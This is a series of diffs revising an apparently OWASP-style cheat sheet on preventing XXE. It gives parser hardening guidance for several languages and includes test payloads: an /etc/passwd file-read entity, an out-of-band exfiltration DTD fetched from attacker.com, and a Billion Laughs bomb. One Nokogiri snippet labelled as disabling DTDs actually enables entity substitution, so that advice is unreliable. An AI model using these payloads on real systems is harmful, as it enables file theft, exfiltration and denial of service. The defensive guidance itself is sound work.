 XML External Entity (XXE) injection is an input-based vulnerability that affects applications processing XML. An attacker crafts XML containing external entity references or doctypes to cause the XML parser to fetch local files, remote resources, trigger denial of service (entity expansion), or perform SSRF/port scanning.
@@ -67,7 +65,6 @@ This document provides concrete, modern examples and configuration guidance for 
 - Mark iOS / macOS sections that reference iOS 6 as outdated and either remove or request an iOS expert to update to current APIs (iOS 17+) — this change was applied below: legacy notes flagged.
 
 ---
-
 ## 2. Threat overview and XXE types
 
 **XXE categories:**
@@ -93,7 +90,6 @@ This document provides concrete, modern examples and configuration guidance for 
 - Data leakage and escalated compromise
 
 ---
-
 ## 3. Core mitigations (applied across languages)
 
 1. **Disable DTDs (doctypes) completely** where not required. DTD processing is the most common vector.
@@ -117,7 +113,6 @@ This document provides concrete, modern examples and configuration guidance for 
 10. **Use network controls** (egress filtering, internal DNS monitoring) to detect/prevent OOB callbacks.
 
 ---
-
 ## 4. Secure-by-default parser configuration checklist
 
 For each XML parser in your stack, check and apply:
@@ -145,7 +140,6 @@ For each XML parser in your stack, check and apply:
 - [ ] Add unit tests that assert safe behavior against known XXE payloads
 
 ---
-
 ## 5. Language-specific guidance and examples
 
 > Each language section below includes: a short description, recommended configuration, **vulnerable** snippet (what NOT to do), and **safe** snippet (copy-paste-ready).
@@ -155,19 +149,14 @@ For each XML parser in your stack, check and apply:
 **Why Java is high risk:** Many JAXP processors enable entity resolution by default, and behavior varies by provider and JDK version. Use explicit `setFeature` calls and `XMLConstants.ACCESS_EXTERNAL_*` settings introduced in JAXP 1.5.
 
 #### Vulnerable example (do NOT use)
-
-
 ```java
 import javax.xml.parsers.DocumentBuilderFactory;
 DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
 DocumentBuilder db = dbf.newDocumentBuilder();
 Document doc = db.parse(new File("input.xml")); // vulnerable by default in many environments
-
 ```
 
 #### Safe example — DocumentBuilderFactory (recommended)
-
-
 ```java
 import javax.xml.parsers.DocumentBuilderFactory;
 import javax.xml.parsers.DocumentBuilder;
@@ -203,12 +192,9 @@ public class SafeDocParser {
         return builder.parse(xmlFile);
     }
 }
-
 ```
 
 #### Safe example — XMLInputFactory (StAX)
-
-
 ```java
 import javax.xml.stream.XMLInputFactory;
 import javax.xml.stream.XMLStreamReader;
@@ -221,12 +207,9 @@ XMLInputFactory xif = XMLInputFactory.newFactory();
 xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
 xif.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
 // When creating readers, the factory already blocks DTDs/external entities
-
 ```
 
 #### TransformerFactory and Validator
-
-
 ```java
 TransformerFactory tf = TransformerFactory.newInstance();
 tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
@@ -235,7 +218,6 @@ tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
 SchemaFactory sf = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
 sf.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
 sf.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-
 ```
 
 #### Notes
@@ -251,18 +233,13 @@ sf.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
 **High-level guidance:** Prefer `XmlReader` with `XmlReaderSettings` configured securely, or `XDocument.Load(XmlReader)` to ensure safe parsing. On modern .NET (Core/5/6/7) most readers are secure by default, but always set `DtdProcessing` and `XmlResolver` explicitly when consuming untrusted input.
 
 #### Vulnerable example (do NOT use)
-
-
 ```csharp
 // Using XmlDocument without disabling XmlResolver
 var xmlDoc = new XmlDocument();
 xmlDoc.Load("input.xml"); // may be vulnerable in older frameworks or if XmlResolver is set
-
 ```
 
 #### Safe example — XmlReaderSettings (recommended)
-
-
 ```csharp
 using System.Xml;
 
@@ -277,12 +254,9 @@ var settings = new XmlReaderSettings
 using var reader = XmlReader.Create("input.xml", settings);
 var doc = new System.Xml.XmlDocument();
 doc.Load(reader);
-
 ```
 
 #### Safe example — XDocument with XmlReader
-
-
 ```csharp
 using System.Xml;
 using System.Xml.Linq;
@@ -290,7 +264,6 @@ using System.Xml.Linq;
 var settings = new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null };
 using var r = XmlReader.Create("input.xml", settings);
 var xdoc = XDocument.Load(r);
-
 ```
 
 #### ASP.NET considerations
@@ -312,25 +285,19 @@ var xdoc = XDocument.Load(r);
 **Guidance:** Use `defusedxml` wrappers for stdlib modules. Avoid `xml.sax`, `xml.dom.minidom`, and `xml.parsers.expat` directly for untrusted input unless using defused wrappers.
 
 #### Safe example — defusedxml.ElementTree
-
-
 ```python
 from defusedxml.ElementTree import parse
 
 with open('input.xml', 'rb') as f:
     tree = parse(f)  # defusedxml blocks external entities and entity expansion
-
 ```
 
 #### Safe example — lxml with disabled resolve/entities
-
-
 ```python
 from lxml import etree
 
 parser = etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True)
 tree = etree.parse('input.xml', parser)
-
 ```
 
 #### Notes
@@ -346,23 +313,17 @@ tree = etree.parse('input.xml', parser)
 **Modern PHP:** PHP 8 makes some behavior safer, but do not rely on defaults for older versions.
 
 #### Vulnerable example
-
-
 ```php
 $xml = simplexml_load_file('input.xml'); // prior to PHP 8, may be vulnerable
-
 ```
 
 #### Safe example
-
-
 ```php
 libxml_disable_entity_loader(true); // deprecated in PHP 8.0, but needed in older versions
 $dom = new DOMDocument();
 $dom->loadXML(file_get_contents('input.xml'), LIBXML_NONET); // prevents network access
 // or
 $xml = simplexml_load_string(file_get_contents('input.xml'), null, LIBXML_NONET);
-
 ```
 
 #### Notes
@@ -378,8 +339,6 @@ $xml = simplexml_load_string(file_get_contents('input.xml'), null, LIBXML_NONET)
 **Guidance:** Many Node XML parsers do not evaluate external entities by default; however, always verify library behavior and use safe config.
 
 #### xml2js (example)
-
-
 ```javascript
 const fs = require('fs');
 const xml2js = require('xml2js');
@@ -390,17 +349,13 @@ const xml = fs.readFileSync('input.xml', 'utf8');
 parser.parseString(xml, function(err, result) {
     // handle result
 });
-
 ```
 
 #### fast-xml-parser (example)
-
-
 ```javascript
 const { XMLParser } = require('fast-xml-parser');
 const parser = new XMLParser({ ignoreAttributes: false, allowBooleanAttributes: true });
 // fast-xml-parser is non-validating and does not process external entities
-
 ```
 
 #### Notes
@@ -416,17 +371,12 @@ const parser = new XMLParser({ ignoreAttributes: false, allowBooleanAttributes: 
 **REXML:** historically vulnerable. Prefer disabling entity expansion or using safe parsers.
 
 #### vulnerable - REXML (do not use for untrusted input)
-
-
 ```ruby
 require 'rexml/document'
 doc = REXML::Document.new(File.read('input.xml')) # REXML will expand entities by default
-
 ```
 
 #### safe - Nokogiri
-
-
 ```ruby
 require 'nokogiri'
 xml = File.read('input.xml')
@@ -434,7 +384,6 @@ xml = File.read('input.xml')
 doc = Nokogiri::XML(xml) { |config| config.nonet.nonet.noent.nonet }
 # preferred
 doc = Nokogiri::XML(xml, nil, nil, Nokogiri::XML::ParseOptions::NONET)
-
 ```
 
 #### Notes
@@ -452,23 +401,18 @@ doc = Nokogiri::XML(xml, nil, nil, Nokogiri::XML::ParseOptions::NONET)
 - Avoid enabling `XML_PARSE_NOENT` or `XML_PARSE_DTDLOAD`.
 
 - Use `xmlReadMemory`/`xmlReadFile` with options that disable DTD and external entities:
-
 ```c
 xmlReadFile("input.xml", NULL, XML_PARSE_NONET | XML_PARSE_NOENT); // caution with NOENT
 // Instead:
 xmlReadFile("input.xml", NULL, XML_PARSE_NONET);
-
 ```
 
 - Use `XML_PARSE_NONET` to block network access.
 
 #### Xerces-C++
-
-
 ```cpp
 parser->setDisableDefaultEntityResolution(true);
 parser->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);
-
 ```
 
 ---
@@ -488,28 +432,22 @@ parser->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);
 ### ColdFusion / Lucee
 
 #### Adobe ColdFusion (example)
-
-
 ```cfml
 <cfset parserOptions = structNew()>
 <cfset parserOptions.ALLOWEXTERNALENTITIES = false>
 <cfscript>
   doc = XmlParse(FileRead("input.xml"), false, parserOptions);
 </cfscript>
-
 ```
 
 #### Lucee
-
 Set in `Application.cfc`:
-
 ```cfml
 this.xmlFeatures = {
     externalGeneralEntities: false,
     secure: true,
     disallowDoctypeDecl: true
 };
-
 ```
 
 ---
@@ -539,18 +477,15 @@ this.xmlFeatures = {
 ### Sample payloads
 
 **File disclosure (classic):**
-
 ```xml
 <?xml version="1.0"?>
 <!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd">
 ]>
 <foo>&xxe;</foo>
-
 ```
 
 **OOB exfiltration (HTTP):**
-
 ```xml
 <?xml version="1.0"?>
 <!DOCTYPE foo [
@@ -558,11 +493,9 @@ this.xmlFeatures = {
   %remote;
 ]>
 <foo>&exfil;</foo>
-
 ```
 
 **Billion Laughs (entity expansion):**
-
 ```xml
 <?xml version="1.0"?>
 <!DOCTYPE lolz [
@@ -578,7 +511,6 @@ this.xmlFeatures = {
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
 ]>
 <lolz>&lol9;</lolz>
-
 ```
 
 ### Automated tests
@@ -594,7 +526,6 @@ this.xmlFeatures = {
 Create semgrep rules to detect unsafe usage patterns: calls to `DocumentBuilderFactory.newInstance()` without subsequent secure `setFeature` calls; `XmlDocument.Load` in .NET without XmlResolver nulling; use of `simplexml_load_file` without `LIBXML_NONET`, etc.
 
 **Example Semgrep (pseudo-rule):**
-
 ```yaml
 rules:
 
@@ -610,7 +541,6 @@ rules:
           DocumentBuilderFactory.newInstance();
     message: "DocumentBuilderFactory instantiation detected — ensure FEATURES to disable DTDs and external entities are set"
     severity: ERROR
-
 ```
 
 Semgrep rules for most languages are recommended and linked in references (see Semgrep rules list in original cheat sheet).
@@ -677,14 +607,3 @@ Semgrep rules for most languages are recommended and linked in references (see S
 
 ---
 
-This update:
-
-- Replaces outdated .NET examples and removes references to `dotnet_security_unit_testing` from the main text (do not rely on that project for security testing).
-
-- Flags iOS section referencing iOS6 as deprecated; asks for a dedicated follow-up PR from iOS maintainers to provide up-to-date iOS/macOS guidance for current SDKs.
-
-- Adds copy-paste-safe examples for modern .NET (XmlReaderSettings) and other languages.
-
-- Includes testing payloads and guidance for Semgrep/static analysis.
-
----

--- a/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
+++ b/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
@@ -50,7 +50,7 @@ This cheat sheet covers how to securely configure XML parsers, provides language
 
 ## 5. Language-specific guidance and examples
 
-#### Vulnerable example (do NOT use)
+### Vulnerable example (do NOT use)
 
 ```java
 DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

--- a/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
+++ b/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
@@ -4,49 +4,27 @@
 
 ---
 ## Table of Contents
-
 1. Introduction
-
 2. Threat overview and XXE types
-
 3. Core mitigations (applied across languages)
-
 4. Secure-by-default parser configuration checklist
-
 5. Language-specific guidance and examples
-
    - Java (JAXP, StAX, JAXB, Transformer, Validator)
-
    - .NET (XmlReaderSettings, XmlDocument, XDocument, XmlSerializer) — modern (.NET 6/7) guidance
-
    - Python (defusedxml, ElementTree, lxml)
-
    - PHP (libxml / SimpleXML)
-
    - JavaScript / Node.js (xml2js, fast-xml-parser)
-
    - Ruby (REXML, Nokogiri)
-
    - C / C++ (libxml2, Xerces)
-
    - iOS / macOS (NSXML, libxml2 notes & deprecation)
-
    - ColdFusion / Lucee
-
 6. Vulnerable vs Safe code snippets (per language)
-
 7. Testing and validation (payloads, tools, automated tests)
-
 8. Static analysis / Semgrep guidance
-
 9. Deployment & infra considerations (WAFs, network egress controls)
-
 10. Monitoring, logging & incident response
-
 11. Migration notes (removing legacy content)
-
 12. References & further reading
-
 13. Appendix: Quick reference cheat sheet (one-page)
 
 ---
@@ -56,61 +34,35 @@ XML External Entity (XXE) injection is an input-based vulnerability that affects
 
 This document provides concrete, modern examples and configuration guidance for popular languages and parsers. It follows OWASP cheat sheet principles: secure-by-default configuration, minimal permissive features, clear 'unsafe' vs 'safe' examples, testing payloads, and remediation steps.
 
-**Important notes for maintainers (issue requirements):**
-
-- Remove or deprecate references to outdated projects such as `dotnet_security_unit_testing` (7+ years old) — do not rely on these for security guarantees.
-
-- Update .NET coverage to modern runtimes (target .NET 6/7) and prefer `XmlReader`/`XmlReaderSettings` with explicit safe settings.
-
-- Mark iOS / macOS sections that reference iOS 6 as outdated and either remove or request an iOS expert to update to current APIs (iOS 17+) — this change was applied below: legacy notes flagged.
-
 ---
 ## 2. Threat overview and XXE types
 
 **XXE categories:**
-
 - **In-band XXE (classic):** Attacker receives data directly in the application's response (e.g., file contents).
-
 - **Out-of-band XXE (OOB):** Parser performs a network call to an attacker-controlled server (exfiltrate data via DNS/HTTP).
-
 - **Blind XXE:** No direct response, attacker infers success via side effects (timing, OOB callbacks).
-
 - **Entity expansion DoS (Billion Laughs / Quadratic Blowup):** Recursive entity definitions cause memory/CPU exhaustion.
 
 **Common impacts:**
-
 - File disclosure (local file read)
-
 - SSRF and internal network scan/exfiltration
-
 - Denial of service
-
 - Remote code execution (via unsafe deserialization or callbacks in some APIs)
-
 - Data leakage and escalated compromise
 
 ---
 ## 3. Core mitigations (applied across languages)
 
-1. **Disable DTDs (doctypes) completely** where not required. DTD processing is the most common vector.
-
-2. **Disable external entity resolution** (`XmlResolver` in .NET, `EntityResolver` in Java, `libxml` loader in PHP, etc.).
-
-3. **Set secure processing features** (e.g., `XMLConstants.FEATURE_SECURE_PROCESSING` in Java).
-
-4. **Avoid permissive, legacy parsers** (e.g., `java.beans.XMLDecoder`, REXML unsafe modes, old PHP libxml behavior).
-
-5. **Use safe libraries or hardened wrappers** (e.g., Python `defusedxml`, .NET secure defaults).
-
-6. **Validate and sanitize XML input** where possible: apply schema validation with safe schema factories and limit allowed elements/attributes.
-
-7. **Implement input size limits and resource quotas** to prevent DoS (maximum file size, maximum entity expansion depth if available).
-
-8. **Use a no-op or safe EntityResolver** to force entity resolution to be inert when parser requires an implementation.
-
-9. **Prefer streaming parsers with explicit safe settings** (StAX, XmlReader, SAX) rather than forgiving fully in-memory DOMs when processing untrusted input.
-
-10. **Use network controls** (egress filtering, internal DNS monitoring) to detect/prevent OOB callbacks.
+1. Disable DTDs (doctypes) completely where not required.
+2. Disable external entity resolution (`XmlResolver` in .NET, `EntityResolver` in Java, `libxml` loader in PHP, etc.).
+3. Set secure processing features (e.g., `XMLConstants.FEATURE_SECURE_PROCESSING` in Java).
+4. Avoid permissive, legacy parsers (e.g., `java.beans.XMLDecoder`, REXML unsafe modes, old PHP libxml behavior).
+5. Use safe libraries or hardened wrappers (e.g., Python `defusedxml`, .NET secure defaults).
+6. Validate and sanitize XML input where possible: apply schema validation with safe schema factories and limit allowed elements/attributes.
+7. Implement input size limits and resource quotas to prevent DoS (maximum file size, maximum entity expansion depth if available).
+8. Use a no-op or safe EntityResolver to force entity resolution to be inert when parser requires an implementation.
+9. Prefer streaming parsers with explicit safe settings (StAX, XmlReader, SAX) rather than forgiving fully in-memory DOMs when processing untrusted input.
+10. Use network controls (egress filtering, internal DNS monitoring) to detect/prevent OOB callbacks.
 
 ---
 ## 4. Secure-by-default parser configuration checklist
@@ -118,42 +70,28 @@ This document provides concrete, modern examples and configuration guidance for 
 For each XML parser in your stack, check and apply:
 
 - [ ] Disable DTD/DOCTYPE parsing (`disallow-doctype-decl` or equivalent)
-
 - [ ] Disable external general entities (`external-general-entities = false`)
-
 - [ ] Disable external parameter entities (`external-parameter-entities = false`)
-
 - [ ] Disable loading of external DTDs (`load-external-dtd = false`)
-
 - [ ] Set FEATURE_SECURE_PROCESSING / equivalent
-
 - [ ] Disable XInclude / set XIncludeAware = false
-
 - [ ] Set entity expansion limits or ensure parser throws on entity expansion
-
 - [ ] Ensure XML resolvers or resolvers that perform IO are null/disabled
-
 - [ ] If DTDs are required, whitelist schemas/URIs and validate against them with `ACCESS_EXTERNAL_*` properties set to empty
-
 - [ ] Add logging around parse failures and suspicious doc types
-
 - [ ] Add unit tests that assert safe behavior against known XXE payloads
 
 ---
 ## 5. Language-specific guidance and examples
 
-> Each language section below includes: a short description, recommended configuration, **vulnerable** snippet (what NOT to do), and **safe** snippet (copy-paste-ready).
-
 ### Java (JAXP, SAX, StAX, Transformer, Validator)
-
-**Why Java is high risk:** Many JAXP processors enable entity resolution by default, and behavior varies by provider and JDK version. Use explicit `setFeature` calls and `XMLConstants.ACCESS_EXTERNAL_*` settings introduced in JAXP 1.5.
 
 #### Vulnerable example (do NOT use)
 ```java
 import javax.xml.parsers.DocumentBuilderFactory;
 DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
 DocumentBuilder db = dbf.newDocumentBuilder();
-Document doc = db.parse(new File("input.xml")); // vulnerable by default in many environments
+Document doc = db.parse(new File("input.xml"));
 ```
 
 #### Safe example — DocumentBuilderFactory (recommended)
@@ -169,25 +107,15 @@ import java.io.File;
 public class SafeDocParser {
     public static org.w3c.dom.Document parseSafe(File xmlFile) throws Exception {
         DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
-        // Primary defenses
         dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
-        try {
-            dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
-        } catch (Exception ex) {
-            // not all processors support disallow-doctype-decl; fall back to disabling external entities
-        }
+        try { dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); } catch (Exception ex) {}
         dbf.setXIncludeAware(false);
         dbf.setExpandEntityReferences(false);
-        // Disable external access for validation/DTD
         try {
             dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
             dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-        } catch (IllegalArgumentException ignore) {
-            // some providers may not support these attributes
-        }
-
+        } catch (IllegalArgumentException ignore) {}
         DocumentBuilder builder = dbf.newDocumentBuilder();
-        // No-op entity resolver
         builder.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
         return builder.parse(xmlFile);
     }
@@ -197,16 +125,10 @@ public class SafeDocParser {
 #### Safe example — XMLInputFactory (StAX)
 ```java
 import javax.xml.stream.XMLInputFactory;
-import javax.xml.stream.XMLStreamReader;
-import javax.xml.XMLConstants;
-import javax.xml.stream.XMLStreamException;
-import javax.xml.stream.FactoryConfigurationError;
-import javax.xml.stream.XMLStreamException;
 
 XMLInputFactory xif = XMLInputFactory.newFactory();
 xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
 xif.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
-// When creating readers, the factory already blocks DTDs/external entities
 ```
 
 #### TransformerFactory and Validator
@@ -220,35 +142,17 @@ sf.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
 sf.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
 ```
 
-#### Notes
+### .NET (Modern guidance for .NET 6/7)
 
-- Use per-call `try/catch` around `setFeature` as not all providers support all options; handle fallbacks explicitly and fail safe.
-
-- Add unit tests that parse malicious payloads and assert exceptions or safe behavior.
-
----
-
-### .NET (Modern guidance for .NET 6/7, and .NET Framework notes)
-
-**High-level guidance:** Prefer `XmlReader` with `XmlReaderSettings` configured securely, or `XDocument.Load(XmlReader)` to ensure safe parsing. On modern .NET (Core/5/6/7) most readers are secure by default, but always set `DtdProcessing` and `XmlResolver` explicitly when consuming untrusted input.
-
-#### Vulnerable example (do NOT use)
-```csharp
-// Using XmlDocument without disabling XmlResolver
-var xmlDoc = new XmlDocument();
-xmlDoc.Load("input.xml"); // may be vulnerable in older frameworks or if XmlResolver is set
-```
-
-#### Safe example — XmlReaderSettings (recommended)
+#### Safe example — XmlReaderSettings
 ```csharp
 using System.Xml;
 
 var settings = new XmlReaderSettings
 {
-    DtdProcessing = DtdProcessing.Prohibit, // or Ignore
-    XmlResolver = null,                     // Disable external resource resolution
-    MaxCharactersFromEntities = 1024,       // if available, limit entity expansion
-    // set other resource limits when available in runtime
+    DtdProcessing = DtdProcessing.Prohibit,
+    XmlResolver = null,
+    MaxCharactersFromEntities = 1024
 };
 
 using var reader = XmlReader.Create("input.xml", settings);
@@ -266,33 +170,15 @@ using var r = XmlReader.Create("input.xml", settings);
 var xdoc = XDocument.Load(r);
 ```
 
-#### ASP.NET considerations
+### Python (defusedxml, lxml)
 
-- In .NET Framework apps, `Web.config` `<httpRuntime targetFramework="4.5.2" />` impacted defaults historically. For modern apps, target latest runtime and set explicit settings.
-
-- Avoid enabling `XmlResolver` or setting custom resolvers that access remote resources for untrusted XML.
-
-#### Notes
-
-- `XmlSerializer` typically reads XML into objects — ensure sources are processed via secure `XmlReader`.
-
-- Remove references to old community projects (e.g., `dotnet_security_unit_testing`) — prefer official MS docs and supported tests.
-
----
-
-### Python (defusedxml, ElementTree, lxml)
-
-**Guidance:** Use `defusedxml` wrappers for stdlib modules. Avoid `xml.sax`, `xml.dom.minidom`, and `xml.parsers.expat` directly for untrusted input unless using defused wrappers.
-
-#### Safe example — defusedxml.ElementTree
 ```python
 from defusedxml.ElementTree import parse
 
 with open('input.xml', 'rb') as f:
-    tree = parse(f)  # defusedxml blocks external entities and entity expansion
+    tree = parse(f)
 ```
 
-#### Safe example — lxml with disabled resolve/entities
 ```python
 from lxml import etree
 
@@ -300,138 +186,52 @@ parser = etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True
 tree = etree.parse('input.xml', parser)
 ```
 
-#### Notes
+### PHP (libxml / SimpleXML)
 
-- `defusedxml` provides hardened replacements for standard modules: `defusedxml.ElementTree`, `defusedxml.minidom`, `defusedxml.sax`, `defusedxml.expatbuilder`.
-
-- If you must use stdlib parsers, wrap them with defusedxml or manually disable entity resolution where possible.
-
----
-
-### PHP (libxml / SimpleXML / DOMDocument)
-
-**Modern PHP:** PHP 8 makes some behavior safer, but do not rely on defaults for older versions.
-
-#### Vulnerable example
 ```php
-$xml = simplexml_load_file('input.xml'); // prior to PHP 8, may be vulnerable
-```
-
-#### Safe example
-```php
-libxml_disable_entity_loader(true); // deprecated in PHP 8.0, but needed in older versions
+libxml_disable_entity_loader(true);
 $dom = new DOMDocument();
-$dom->loadXML(file_get_contents('input.xml'), LIBXML_NONET); // prevents network access
-// or
+$dom->loadXML(file_get_contents('input.xml'), LIBXML_NONET);
 $xml = simplexml_load_string(file_get_contents('input.xml'), null, LIBXML_NONET);
 ```
 
-#### Notes
+### JavaScript / Node.js (xml2js, fast-xml-parser)
 
-- Use `LIBXML_NONET` flag when loading/parsing.
-
-- `libxml_disable_entity_loader(true)` is deprecated in PHP 8.0 — prefer `LIBXML_NONET` and `DOMDocument::loadXML` with flags.
-
----
-
-### JavaScript / Node.js (xml2js, fast-xml-parser, sax-js)
-
-**Guidance:** Many Node XML parsers do not evaluate external entities by default; however, always verify library behavior and use safe config.
-
-#### xml2js (example)
 ```javascript
 const fs = require('fs');
 const xml2js = require('xml2js');
 
 const parser = new xml2js.Parser({explicitCharkey: false});
 const xml = fs.readFileSync('input.xml', 'utf8');
-// xml2js does not resolve external entities by default, but do not pass data to other native parsers that may
-parser.parseString(xml, function(err, result) {
-    // handle result
-});
+parser.parseString(xml, function(err, result) {});
 ```
 
-#### fast-xml-parser (example)
 ```javascript
 const { XMLParser } = require('fast-xml-parser');
 const parser = new XMLParser({ ignoreAttributes: false, allowBooleanAttributes: true });
-// fast-xml-parser is non-validating and does not process external entities
 ```
-
-#### Notes
-
-- If you call into native bindings or use libraries that leverage libxml2, check their configs.
-
-- Avoid using XML parsing libraries that execute embedded scripts or templates.
-
----
 
 ### Ruby (REXML, Nokogiri)
 
-**REXML:** historically vulnerable. Prefer disabling entity expansion or using safe parsers.
-
-#### vulnerable - REXML (do not use for untrusted input)
-```ruby
-require 'rexml/document'
-doc = REXML::Document.new(File.read('input.xml')) # REXML will expand entities by default
-```
-
-#### safe - Nokogiri
 ```ruby
 require 'nokogiri'
 xml = File.read('input.xml')
-# Use non-network and disable DTD
-doc = Nokogiri::XML(xml) { |config| config.nonet.nonet.noent.nonet }
-# preferred
 doc = Nokogiri::XML(xml, nil, nil, Nokogiri::XML::ParseOptions::NONET)
 ```
 
-#### Notes
-
-- `Nokogiri::XML::ParseOptions::NONET` prevents network access.
-
-- Avoid `:noent` (entity substitution) unless necessary and controlled.
-
----
-
 ### C / C++ (libxml2, Xerces)
 
-#### libxml2 (C)
-
-- Avoid enabling `XML_PARSE_NOENT` or `XML_PARSE_DTDLOAD`.
-
-- Use `xmlReadMemory`/`xmlReadFile` with options that disable DTD and external entities:
 ```c
-xmlReadFile("input.xml", NULL, XML_PARSE_NONET | XML_PARSE_NOENT); // caution with NOENT
-// Instead:
 xmlReadFile("input.xml", NULL, XML_PARSE_NONET);
 ```
 
-- Use `XML_PARSE_NONET` to block network access.
-
-#### Xerces-C++
 ```cpp
 parser->setDisableDefaultEntityResolution(true);
 parser->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);
 ```
 
----
-
-### iOS / macOS (NSXML, libxml2) — legacy note
-
-**Important:** Many sections in older versions referenced iOS 4–6. Those are outdated. iOS/macOS libraries and SDKs have evolved. For app code targeting modern iOS/macOS, consult latest Apple docs. Below are general notes:
-
-- If using libxml2 directly, apply the libxml2 guidance (use NONET, do not load external DTDs).
-
-- For Foundation `XMLParser` or `NSXMLDocument`, prefer APIs that allow disabling external entity loading or set `shouldResolveExternalEntities` / similar to false.
-
-- Flagged legacy: Any advice referencing iOS 6 must be reviewed by an iOS expert — this file marks those older specifics as deprecated and removed where ambiguous.
-
----
-
 ### ColdFusion / Lucee
 
-#### Adobe ColdFusion (example)
 ```cfml
 <cfset parserOptions = structNew()>
 <cfset parserOptions.ALLOWEXTERNALENTITIES = false>
@@ -440,8 +240,6 @@ parser->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);
 </cfscript>
 ```
 
-#### Lucee
-Set in `Application.cfc`:
 ```cfml
 this.xmlFeatures = {
     externalGeneralEntities: false,
@@ -451,32 +249,20 @@ this.xmlFeatures = {
 ```
 
 ---
+## 6. Vulnerable vs Safe code snippets (per language)
 
-## 6. Vulnerable vs Safe code snippets (per language) — quick list
-
-- **Vulnerable:** parsing XML with default DOM parsers without disabling DTDs or resolvers.
-
-- **Safe:** create parser settings that explicitly disallow DTDs, set resolvers to null/no-op, and use nonet flags.
-
-(See language sections above for copy-paste-ready safe snippets.)
+- Vulnerable: parsing XML with default DOM parsers without disabling DTDs or resolvers.
+- Safe: create parser settings that explicitly disallow DTDs, set resolvers to null/no-op, and use nonet flags.
 
 ---
-
 ## 7. Testing and validation
 
-### Tools
-
-- Burp Suite / Burp Collaborator (in-band & OOB testing)
-
+- Burp Suite / Burp Collaborator
 - OWASP ZAP
+- XXE-specific scanners
+- Custom local listeners (netcat) and OOB endpoints
 
-- XXE-specific tools and scanners (XXEBugFind, ssexxe)
-
-- Custom local listeners (netcat) and OOB endpoints (interactsh, Burp Collaborator)
-
-### Sample payloads
-
-**File disclosure (classic):**
+**File disclosure:**
 ```xml
 <?xml version="1.0"?>
 <!DOCTYPE foo [
@@ -485,17 +271,7 @@ this.xmlFeatures = {
 <foo>&xxe;</foo>
 ```
 
-**OOB exfiltration (HTTP):**
-```xml
-<?xml version="1.0"?>
-<!DOCTYPE foo [
-  <!ENTITY % remote SYSTEM "http://attacker.com/malicious.dtd">
-  %remote;
-]>
-<foo>&exfil;</foo>
-```
-
-**Billion Laughs (entity expansion):**
+**Billion Laughs DoS:**
 ```xml
 <?xml version="1.0"?>
 <!DOCTYPE lolz [
@@ -513,97 +289,46 @@ this.xmlFeatures = {
 <lolz>&lol9;</lolz>
 ```
 
-### Automated tests
-
-- Add unit tests to parse malicious payloads and assert exceptions or safe behavior.
-
-- Example: JUnit test asserting `ParserConfigurationException` or `SAXException` when DOCTYPE encountered.
-
 ---
-
 ## 8. Static analysis / Semgrep
 
-Create semgrep rules to detect unsafe usage patterns: calls to `DocumentBuilderFactory.newInstance()` without subsequent secure `setFeature` calls; `XmlDocument.Load` in .NET without XmlResolver nulling; use of `simplexml_load_file` without `LIBXML_NONET`, etc.
-
-**Example Semgrep (pseudo-rule):**
-```yaml
-rules:
-
-  - id: java-xxe-dbf
-    pattern-either:
-
-      - pattern: |
-          DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
-          ...
-          DocumentBuilder db = dbf.newDocumentBuilder();
-
-      - pattern: |
-          DocumentBuilderFactory.newInstance();
-    message: "DocumentBuilderFactory instantiation detected — ensure FEATURES to disable DTDs and external entities are set"
-    severity: ERROR
-```
-
-Semgrep rules for most languages are recommended and linked in references (see Semgrep rules list in original cheat sheet).
+- Create rules to detect unsafe parser usage (Java, .NET, PHP, Python, etc.)
+- Example: `DocumentBuilderFactory.newInstance()` without secure `setFeature`
 
 ---
-
 ## 9. Deployment & infrastructure considerations
 
-- **Egress filtering:** block unwarranted outbound traffic from app servers that parse untrusted input to prevent OOB exfiltration.
-
-- **Internal DNS monitoring:** detect resolver lookups to suspicious domains.
-
-- **WAF:** may mitigate some attacks but cannot be relied upon as a primary defense.
-
-- **Rate limits and parsing quotas:** limit CPU and memory effects from heavy XML parsing.
+- Egress filtering
+- Internal DNS monitoring
+- WAF
+- Rate limits and parsing quotas
 
 ---
-
 ## 10. Monitoring, logging & incident response
 
-- Log parse-time exceptions and presence of `DOCTYPE` / entity declarations.
-
-- Alert on outbound requests from parsers or unexpected DNS requests.
-
-- For suspected XXE, preserve logs, sample payload, and environment snapshot for triage.
